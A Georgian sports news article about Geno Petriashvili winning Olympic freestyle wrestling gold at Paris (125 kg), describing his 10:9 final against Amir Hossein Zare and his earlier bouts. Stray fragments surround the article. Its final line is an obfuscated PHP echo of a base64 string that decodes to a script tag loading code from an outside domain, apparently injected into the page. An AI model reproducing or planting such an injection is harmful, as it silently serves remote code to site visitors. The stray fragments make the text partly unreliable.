celsiusi
ავერსი შნაიდერი

ქართველი თავისუფალი სტილით მოჭიდავე გენო პეტრიაშვილი (-125 კგ) ოლიმპიური ჩემპიონია.

შეჯიბრების ფინალში პეტრიაშვილმა მსოფლიოს ორგზის ჩემპიონი, 23 წლის ირანელი სპორტსმენი ამირ ჰოსეინ ზარე 10:9 დაამარცხა და საქართველოს პარიზის ოლიმპიადაზე მეხუთე მედალი მოუტანა.

პირველივე ნახევარში გენომ აქტიურად შეუტია მეტოქეს, ეფექტური გდებების შემდეგ 11:1 დაწინაურდა. თავისუფალ ჭიდაობაში 10-ქულიანი უპირატესობა უკვე გამარჯვებას ნიშნავს, თუმცა მსაჯებმა ჩელენჯის შემდეგ ქართველს ერთი ქულა ჩამოაკლეს და ანგარიში 10:1 გახდა. შეხვედრა გაგრჩელდა.

მეორე ნახევარში ზარემ მაქსიმალურად მოინდომა, 9 ქულამდეც ავიდა, თუმცა პეტრიაშვილს ოლიმპიური ოქრო მაინც ვერ წაართვა.

30 წლის ქართველმა ფალავანმა ოლიმპიადაზე გამოსვლა გუშინ დაიწყო. მერვედფინალში უკრაინელი ხოციანივსკი 11:0 დაამარცხა, მეთხედფინალში პოლონელ რობერტ ბარანს 9:2 სძლია, ხოლო ნახევარფინალში აზერბაიჯანის სახელით გამომსვლელ გიორგი მეშვილდიშვილს 7:0 აჯობა.

აქამდე პეტრიაშვილი რიოს ოლიმპიადის ბრინჯაოსა და ტოკიოს ოლიმპიადის ვერცხლის მედლებს ფლობდა. ის მსოფლიოს სამგზის და ევროპის ორგზის ჩემპიონიცაა.

101
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");